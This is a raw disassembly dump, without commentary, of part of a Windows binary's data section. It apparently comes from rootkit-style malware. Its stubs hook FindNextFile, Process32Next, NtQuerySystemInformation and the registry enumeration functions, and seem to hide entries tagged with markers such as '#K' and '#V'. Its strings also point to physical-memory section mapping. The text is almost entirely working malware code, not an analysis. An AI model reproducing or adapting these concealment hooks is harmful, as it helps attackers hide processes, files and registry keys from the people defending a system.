dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401EE9
dd offset loc_401EE9
dd offset loc_401F5B
dd offset loc_401F86
dd offset loc_401FFE
dd offset loc_401FC4
dd offset loc_401ED8
dd offset loc_401FB2
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401FB2
dd offset loc_401FC4
dd offset loc_401FB2
dd offset loc_401FB2
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
off_43B514 dd offset loc_401E69 ; DATA XREF: sub_401DE8+281�r
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_401FDB
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_401FEE
dd offset loc_401FEE
dd offset loc_401FEE
dd offset loc_401FEE
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_401ED8
dd offset loc_401FFE
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401FFE
dd offset loc_401FFE
dd offset loc_401FFE
dd offset loc_401FFE
dd offset loc_401FFE
dd offset loc_401FFE
dd offset loc_401FFE
dd offset loc_401FFE
dd offset loc_401FB2
dd offset loc_401FB2
dd offset loc_402014
dd offset loc_4020B1
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401FB2
dd offset loc_401FC4
dd offset loc_402020
dd offset loc_4020B1
dd offset loc_402014
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_401E7B
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401E69
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401ED8
dd offset loc_401FFE
dd offset loc_401FFE
dd offset loc_401FDB
dd offset loc_401ED8
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_401F0F
dd offset loc_40202C
dd offset loc_401F30
dd offset loc_401F30
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_401E96
dd offset loc_401E96
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_401E69
dd offset loc_401E69
off_43B6E4 dd offset loc_402075 ; DATA XREF: sub_401DE8+26C�r
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_4020AA
dd offset loc_4020AA
dd offset loc_4020B1
dd offset loc_4020AA
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_40208E
dd offset loc_40208E
dd offset loc_40208E
dd offset loc_40208E
dd offset loc_40208E
dd offset loc_40208E
dd offset loc_40208E
dd offset loc_40208E
dd offset loc_40208E
dd offset loc_40208E
dd offset loc_40208E
dd offset loc_40208E
dd offset loc_40208E
dd offset loc_40208E
dd offset loc_40208E
dd offset loc_40208E
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_402075
dd offset loc_40209B
dd offset loc_402075
dd offset loc_4020AA
dd offset loc_4020AA
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_402075
dd offset loc_40209B
dd offset loc_402075
dd offset loc_4020AA
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_4020AA
dd offset loc_4020AA
dd offset loc_40209B
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_402075
dd offset loc_4020AA
dd offset loc_4020AA
dd offset loc_4020AA
dd offset loc_4020AA
dd offset loc_4020AA
dd offset loc_4020AA
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
dd offset loc_4020B1
aFindnextfilea db 'FindNextFileA',0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_43B873: ; CODE XREF: .data:0043B8BC�j
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BA80h
test eax, eax
jz short loc_43B8BE
pusha
mov eax, [ebp+0Ch]
add eax, 2Ch
mov ebx, eax
loc_43B88D: ; CODE XREF: .data:0043B893�j
cmp byte ptr [ebx], 0
jz short loc_43B895
inc ebx
jmp short loc_43B88D
; ---------------------------------------------------------------------------
loc_43B895: ; CODE XREF: .data:0043B890�j
mov word ptr [ebx], 463Ah
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FC4B6h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43B8BB
popa
jmp short loc_43B8BE
; ---------------------------------------------------------------------------
loc_43B8BB: ; CODE XREF: .data:0043B8B6�j
popa
jmp short loc_43B873
; ---------------------------------------------------------------------------
loc_43B8BE: ; CODE XREF: .data:0043B880�j
; .data:0043B8B9�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 6E694600h, 78654E64h, 6C694674h
db 65h, 57h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_43B8F4: ; CODE XREF: .data:0043B943�j
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BB01h
test eax, eax
jz short loc_43B945
pusha
mov eax, [ebp+0Ch]
add eax, 2Ch
mov ebx, eax
loc_43B90E: ; CODE XREF: .data:0043B916�j
cmp word ptr [ebx], 0
jz short loc_43B918
inc ebx
inc ebx
jmp short loc_43B90E
; ---------------------------------------------------------------------------
loc_43B918: ; CODE XREF: .data:0043B912�j
mov dword ptr [ebx], 46003Ah
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50C63Dh
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43B942
popa
jmp short loc_43B945
; ---------------------------------------------------------------------------
loc_43B942: ; CODE XREF: .data:0043B93D�j
popa
jmp short loc_43B8F4
; ---------------------------------------------------------------------------
loc_43B945: ; CODE XREF: .data:0043B901�j
; .data:0043B940�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
dw 0FFFFh
dword_43B958 dd 0FFFFFFh, 7551744Eh, 53797265h, 65747379h, 666E496Dh
; DATA XREF: .data:0043BEA4�o
dd 616D726Fh, 6E6F6974h
db 0
; ---------------------------------------------------------------------------
loc_43B975: ; DATA XREF: .data:0043BEAC�o
push ebp
mov ebp, esp
sub esp, 24h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
sub esp, 10h
mov eax, [ebp+14h]
mov edi, [ebp+10h]
mov ebx, [ebp+0Ch]
mov [esp+0Ch], eax
mov [esp+8], edi
mov [esp+4], ebx
mov esi, [ebp+8]
mov [esp], esi
call near ptr 245BBABh
mov [ebp-4], eax
cmp esi, 5
jz short loc_43B9C5
loc_43B9B1: ; CODE XREF: .data:0043B9CB�j
; .data:0043BA1E�j
mov eax, [ebp-4]
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_43B9C5: ; CODE XREF: .data:0043B9AF�j
cmp edi, 1F40h
jle short loc_43B9B1
jmp short loc_43B9D3
; ---------------------------------------------------------------------------
loc_43B9CF: ; CODE XREF: .data:0043BA20�j
mov esi, ebx
loc_43B9D1: ; CODE XREF: .data:0043BA18�j
add ebx, eax
loc_43B9D3: ; CODE XREF: .data:0043B9CD�j
pusha
mov eax, [ebx+44h]
push 50h
sub esp, 20h
xor ebx, ebx
loc_43B9E1: ; CODE XREF: .data:0043B9F4�j
bt eax, ebx
jb short loc_43B9EC
mov byte ptr [esp+ebx], 30h
jmp short loc_43B9F0
; ---------------------------------------------------------------------------
loc_43B9EC: ; CODE XREF: .data:0043B9E4�j
mov byte ptr [esp+ebx], 31h
loc_43B9F0: ; CODE XREF: .data:0043B9EA�j
inc ebx
cmp ebx, 20h
jnz short loc_43B9E1
push esp
call near ptr 0C4FC608h
add esp, 24h
test ax, ax
jnz short loc_43BA07
popa
jmp short loc_43BA1A
; ---------------------------------------------------------------------------
loc_43BA07: ; CODE XREF: .data:0043BA02�j
popa
mov eax, [ebx]
test eax, eax
jnz short loc_43BA16
mov dword ptr [esi], 0
jmp short loc_43BA1A
; ---------------------------------------------------------------------------
loc_43BA16: ; CODE XREF: .data:0043BA0C�j
add [esi], eax
jmp short loc_43B9D1
; ---------------------------------------------------------------------------
loc_43BA1A: ; CODE XREF: .data:0043BA05�j
; .data:0043BA14�j
mov eax, [ebx]
test eax, eax
jz short loc_43B9B1
jmp short loc_43B9CF
; ---------------------------------------------------------------------------
dw 0FFFFh
dd 0FFFFFFh
aProcess32next db 'Process32Next',0 ; DATA XREF: .data:off_43BE94�o
word_43BA36 dw 8360h ; DATA XREF: .data:off_43BE9C�o
dd 46A08C5h, 0B0BE855h, 0C0850B0Bh, 0EB610374h, 458B610Bh
dd 1013D08h, 14740101h, 80808E8h, 1FF8108h, 74010101h
dd 1013D07h, 5750101h, 20202E9h
db 2
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_43BA7E: ; CODE XREF: .data:0043BACC�j
sub esp, 8
mov ebx, [ebp+0Ch]
mov edi, [ebp+8]
mov [esp+4], ebx
mov [esp], edi
call near ptr 245BC95h
test eax, eax
jz short loc_43BACE
pusha
mov eax, [ebx+8]
push 50h
sub esp, 20h
xor ebx, ebx
loc_43BAA5: ; CODE XREF: .data:0043BAB8�j
bt eax, ebx
jb short loc_43BAB0
mov byte ptr [esp+ebx], 30h
jmp short loc_43BAB4
; ---------------------------------------------------------------------------
loc_43BAB0: ; CODE XREF: .data:0043BAA8�j
mov byte ptr [esp+ebx], 31h
loc_43BAB4: ; CODE XREF: .data:0043BAAE�j
inc ebx
cmp ebx, 20h
jnz short loc_43BAA5
push esp
call near ptr 0C4FC6CCh
add esp, 24h
test ax, ax
jnz short loc_43BACB
popa
jmp short loc_43BACE
; ---------------------------------------------------------------------------
loc_43BACB: ; CODE XREF: .data:0043BAC6�j
popa
jmp short loc_43BA7E
; ---------------------------------------------------------------------------
loc_43BACE: ; CODE XREF: .data:0043BA95�j
; .data:0043BAC9�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 4179654Bh
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43BAF4: ; CODE XREF: .data:0043BB41�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BD07h
test eax, eax
jnz short loc_43BB43
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43BB0F: ; CODE XREF: .data:0043BB15�j
cmp byte ptr [ebx], 0
jz short loc_43BB17
inc ebx
jmp short loc_43BB0F
; ---------------------------------------------------------------------------
loc_43BB17: ; CODE XREF: .data:0043BB12�j
mov word ptr [ebx], 4B23h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FC738h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43BB3D
popa
jmp short loc_43BB43
; ---------------------------------------------------------------------------
loc_43BB3D: ; CODE XREF: .data:0043BB38�j
popa
inc dword ptr [ebp+0Ch]
jmp short loc_43BAF4
; ---------------------------------------------------------------------------
loc_43BB43: ; CODE XREF: .data:0043BB07�j
; .data:0043BB3B�j
pop ebp
retn 10h
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 5779654Bh
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43BB5C: ; CODE XREF: .data:0043BBAF�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BD6Fh
test eax, eax
jnz short loc_43BBB1
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43BB77: ; CODE XREF: .data:0043BB7F�j
cmp word ptr [ebx], 0
jz short loc_43BB81
inc ebx
inc ebx
jmp short loc_43BB77
; ---------------------------------------------------------------------------
loc_43BB81: ; CODE XREF: .data:0043BB7B�j
mov dword ptr [ebx], 4B0023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50C8A6h
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43BBAB
popa
jmp short loc_43BBB1
; ---------------------------------------------------------------------------
loc_43BBAB: ; CODE XREF: .data:0043BBA6�j
popa
inc dword ptr [ebp+0Ch]
jmp short loc_43BB5C
; ---------------------------------------------------------------------------
loc_43BBB1: ; CODE XREF: .data:0043BB6F�j
; .data:0043BBA9�j
pop ebp
retn 10h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
dword_43BBB8 dd 5200FFFFh, 6E456765h, 654B6D75h, 57784579h db 0
; ---------------------------------------------------------------------------
loc_43BBC9: ; DATA XREF: .data:0043BEFC�o
push ebp
mov ebp, esp
loc_43BBCC: ; CODE XREF: .data:0043BC47�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43BBDA
push dword ptr [eax]
loc_43BBDA: ; CODE XREF: .data:0043BBD6�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BDF9h
test eax, eax
jnz short loc_43BC49
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43BC01: ; CODE XREF: .data:0043BC09�j
cmp word ptr [ebx], 0
jz short loc_43BC0B
inc ebx
inc ebx
jmp short loc_43BC01
; ---------------------------------------------------------------------------
loc_43BC0B: ; CODE XREF: .data:0043BC05�j
mov dword ptr [ebx], 4B0023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50C930h
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43BC35
popa
jmp short loc_43BC49
; ---------------------------------------------------------------------------
loc_43BC35: ; CODE XREF: .data:0043BC30�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43BC42
pop dword ptr [eax]
loc_43BC42: ; CODE XREF: .data:0043BC3E�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43BBCC
; ---------------------------------------------------------------------------
loc_43BC49: ; CODE XREF: .data:0043BBF9�j
; .data:0043BC33�j
add esp, 4
cmp dword ptr [ebp+20h], 0
jz short loc_43BC55
add esp, 4
loc_43BC55: ; CODE XREF: .data:0043BC50�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
dd 5200FFFFh, 6E456765h, 654B6D75h, 41784579h
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43BC70: ; CODE XREF: .data:0043BCE5�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43BC7E
push dword ptr [eax]
loc_43BC7E: ; CODE XREF: .data:0043BC7A�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BE9Dh
test eax, eax
jnz short loc_43BCE7
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43BCA5: ; CODE XREF: .data:0043BCAB�j
cmp byte ptr [ebx], 0
jz short loc_43BCAD
inc ebx
jmp short loc_43BCA5
; ---------------------------------------------------------------------------
loc_43BCAD: ; CODE XREF: .data:0043BCA8�j
mov word ptr [ebx], 4B23h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FC8CEh
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43BCD3
popa
jmp short loc_43BCE7
; ---------------------------------------------------------------------------
loc_43BCD3: ; CODE XREF: .data:0043BCCE�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43BCE0
pop dword ptr [eax]
loc_43BCE0: ; CODE XREF: .data:0043BCDC�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43BC70
; ---------------------------------------------------------------------------
loc_43BCE7: ; CODE XREF: .data:0043BC9D�j
; .data:0043BCD1�j
add esp, 4
cmp dword ptr [ebp+20h], 0
jz short loc_43BCF3
add esp, 4
loc_43BCF3: ; CODE XREF: .data:0043BCEE�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 0FFh
dword_43BCF8 dd 0FFFFFFFFh, 67655200h, 6D756E45h, 756C6156h db 65h, 57h, 0
; ---------------------------------------------------------------------------
loc_43BD0B: ; DATA XREF: .data:0043BF1C�o
push ebp
mov ebp, esp
loc_43BD0E: ; CODE XREF: .data:0043BD89�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43BD1C
push dword ptr [eax]
loc_43BD1C: ; CODE XREF: .data:0043BD18�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BF3Bh
test eax, eax
jnz short loc_43BD8B
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43BD43: ; CODE XREF: .data:0043BD4B�j
cmp word ptr [ebx], 0
jz short loc_43BD4D
inc ebx
inc ebx
jmp short loc_43BD43
; ---------------------------------------------------------------------------
loc_43BD4D: ; CODE XREF: .data:0043BD47�j
mov dword ptr [ebx], 560023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50CA72h
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43BD77
popa
jmp short loc_43BD8B
; ---------------------------------------------------------------------------
loc_43BD77: ; CODE XREF: .data:0043BD72�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43BD84
pop dword ptr [eax]
loc_43BD84: ; CODE XREF: .data:0043BD80�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43BD0E
; ---------------------------------------------------------------------------
loc_43BD8B: ; CODE XREF: .data:0043BD3B�j
; .data:0043BD75�j
add esp, 4
cmp dword ptr [ebp+24h], 0
jz short loc_43BD97
add esp, 4
loc_43BD97: ; CODE XREF: .data:0043BD92�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 756C6156h
db 65h, 41h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43BDB2: ; CODE XREF: .data:0043BE27�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43BDC0
push dword ptr [eax]
loc_43BDC0: ; CODE XREF: .data:0043BDBC�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245BFDFh
test eax, eax
jnz short loc_43BE29
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43BDE7: ; CODE XREF: .data:0043BDED�j
cmp byte ptr [ebx], 0
jz short loc_43BDEF
inc ebx
jmp short loc_43BDE7
; ---------------------------------------------------------------------------
loc_43BDEF: ; CODE XREF: .data:0043BDEA�j
mov word ptr [ebx], 5623h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FCA10h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43BE15
popa
jmp short loc_43BE29
; ---------------------------------------------------------------------------
loc_43BE15: ; CODE XREF: .data:0043BE10�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43BE22
pop dword ptr [eax]
loc_43BE22: ; CODE XREF: .data:0043BE1E�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43BDB2
; ---------------------------------------------------------------------------
loc_43BE29: ; CODE XREF: .data:0043BDDF�j
; .data:0043BE13�j
add esp, 4
cmp dword ptr [ebp+24h], 0
jz short loc_43BE35
add esp, 4
loc_43BE35: ; CODE XREF: .data:0043BE30�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
db 2 dup(0FFh), 0
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_402B12+44D�o
; .data:off_43BE98�o
aNtdll_dll db 'ntdll.dll',0 ; DATA XREF: sub_4022D1+A�o
; .data:0043BEA8�o ...
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: .data:0043BEF8�o
; .data:0043BF18�o
aIphlpapi_dll db 'iphlpapi.dll',0
aInetmib1_dll db 'inetmib1.dll',0
aWsock32_dll db 'wsock32.dll',0
aUser32_dll db 'user32.dll',0
off_43BE94 dd offset aProcess32next ; DATA XREF: sub_402B12+C5�r
; sub_402B12+F8�r ...
; "Process32Next"
off_43BE98 dd offset aKernel32_dll ; DATA XREF: sub_402B12+A6�r
; "kernel32.dll"
off_43BE9C dd offset word_43BA36 ; DATA XREF: sub_402936+1BA�r
byte_43BEA0 db 0 ; DATA XREF: sub_402B12+71�r
; sub_402B12+8E�r
align 4
dd offset dword_43B958+4
dd offset aNtdll_dll ; "ntdll.dll"
dd offset loc_43B975
dd 1, 43B8D5h, 43BE3Fh, 43B8E3h, 1, 43B854h, 43BE3Fh, 43B862h
dd 2, 43BB4Dh, 43BE56h, 43BB59h, 1, 43BAE5h, 43BE56h, 43BAF1h
dd 0
dd offset dword_43BBB8+3
dd offset aAdvapi32_dll ; "advapi32.dll"
dd offset loc_43BBC9
dd 1, 43BC5Fh, 43BE56h, 43BC6Dh, 0
dd offset dword_43BCF8+5
dd offset aAdvapi32_dll ; "advapi32.dll"
dd offset loc_43BD0B
dd 1, 43BDA1h, 43BE56h, 43BDAFh, 5 dup(0)
dd 7
dword_43BF48 dd 0Fh dword_43BF4C dd 0 ; .text:loc_402270�r ...
aRtlinitunicode db 'RtlInitUnicodeString',0 ; DATA XREF: sub_4022D1+1B�o
aNtunmapviewofs db 'NtUnmapViewOfSection',0 ; DATA XREF: sub_4022D1+30�o
aAxo db 'AXo',0
aNtopensection db 'NtOpenSection',0 ; DATA XREF: sub_4022D1+40�o
a1e db ' 1E',0
aNtmapviewofsec db 'NtMapViewOfSection',0 ; DATA XREF: sub_4022D1+50�o
aRtlntstatustod db 'RtlNtStatusToDosError',0 ; DATA XREF: sub_4022D1+60�o
a_mip@ db '_mIP@',0
aCurrent_user db 'CURRENT_USER',0 ; DATA XREF: sub_402355+B0�o
aDevicePhysical: ; DATA XREF: sub_402355+1F�o
unicode 0, <\device\physicalmemory>,0
word_43BFFA dw 58h ; DATA XREF: sub_402355+15�r
aZ9daw db 'z9Daw',0 ; DATA XREF: sub_4024F3+34�o
align 4
dword_43C004 dd 8 ; sub_403010+EC�r
dd 0Dh
dword_43C00C dd 0 ; .text:loc_4025BF�r ...
aWcscmp db 'wcscmp',0 ; DATA XREF: .data:off_43C09C�o
aL8pjq db 'l 8pjQ',0
aHtons db 'htons',0
aP db ':P',0
aVirtualprotect db 'VirtualProtect',0
aGetcurrentproc db 'GetCurrentProcessId',0
aFindwindowa db 'FindWindowA',0
aSendmessagea db 'SendMessageA',0
db 'h',0
aIsbadreadptr db 'IsBadReadPtr',0
aGlobalfindatom db 'GlobalFindAtomA',0
aGlobalfindat_0 db 'GlobalFindAtomW',0
aPql db '!*pQL',0
byte_43C098 db 3 ; DATA XREF: sub_402639+91�r
align 4
off_43C09C dd offset aWcscmp ; DATA XREF: sub_402639+108�r
; sub_402639+165�r
; "wcscmp"
off_43C0A0 dd offset aNtdll_dll ; DATA XREF: sub_402639+F5�r
; "ntdll.dll"
dd 5, 43C01Eh, 43BE7Dh, 7, 43C027h, 43BE3Fh, 8, 43C036h
dd 43BE3Fh, 9, 43C04Ah, 43BE89h, 0Ah, 43C056h, 43BE89h
dd 0Bh, 43C065h, 43BE3Fh, 0Ch, 43C072h, 43BE3Fh, 0Dh, 43C082h
dd 43BE3Fh
dword_43C104 dd 367F7F5Fh, 202B20hword_43C10C dw 6Dh ; DATA XREF: sub_402639+13A�r
byte_43C10E db 0 ; DATA XREF: sub_402639+1C9�o
a@? db '@~?^',0 ; DATA XREF: sub_402936+144�o
aINW db 'I&n-*w',0 ; DATA XREF: sub_402936+15E�o
word_43C11B dw 23h ; DATA XREF: sub_402936+1A5�r
aR_0 db '`r_0',0 ; DATA XREF: sub_402B12+4A�o
aQyg6 db 'QYG6',0 ; DATA XREF: sub_402B12+20A�o
dword_43C127 dd 2C597Ah byte_43C12B db 0 ; DATA XREF: sub_402B12+340�o
byte_43C12C db 0 ; DATA XREF: sub_402B12+37D�o
aH@d8u db '#h<@D8u',0 ; DATA XREF: sub_402B12+3B1�o
aMg6g_ox db 'mƒ6g.oX',0 ; DATA XREF: sub_403010+CD�o
dword_43C13D dd 613547h byte_43C141 db 2 dup(20h), 0 ; DATA XREF: sub_403010+2C5�o
dword_43C144 dd 674E7Ch word_43C148 dw 58h ; DATA XREF: sub_403010+39A�r
align 4
dd 6, 0Bh
dword_43C154 dd 6 ; sub_4033BC:loc_4033EA�r ...
byte_43C158 db 20h, 5Fh, 0 ; DATA XREF: sub_403453+14�o
aVp db '$',27h,'vp',0 ; DATA XREF: sub_403453+62�o
aY@j? db 'y@j?',0 ; DATA XREF: sub_403453+C6�o
dword_43C165 dd 352067h byte_43C169 db 0 ; DATA XREF: sub_40352B+1C�o
dword_43C16A dd 7A5A26h align 10h
dd 0
dword_43C174 dd 0Fh dword_43C178 dd 0 ; sub_40364E:loc_40367B�r ...
a4d_w db '4D_w',0 ; DATA XREF: sub_4036DA+F�o
byte_43C181 db 0 ; DATA XREF: sub_4036DA+1F�o
aMrie db 'mrie',0 ; DATA XREF: sub_4036DA+9F�o
aE0ls db 'E0LS',0 ; DATA XREF: sub_4037D7+1C�o
aR db ' r',0 ; DATA XREF: sub_4037D7+48�o
align 10h
dd 4, 11h
dword_43C198 dd 0 ; sub_40383E:loc_40386C�r ...
dword_43C19C dd 7E6E58h aQetMvo db 'Qet<mvo',0 ; DATA XREF: .text:0040397D�o
aDp db 'Dp',0 ; DATA XREF: .text:00403A1D�o
align 4
dd 3, 12h
dword_43C1B4 dd 0D0h ; sub_403A31:loc_403A57�r ...
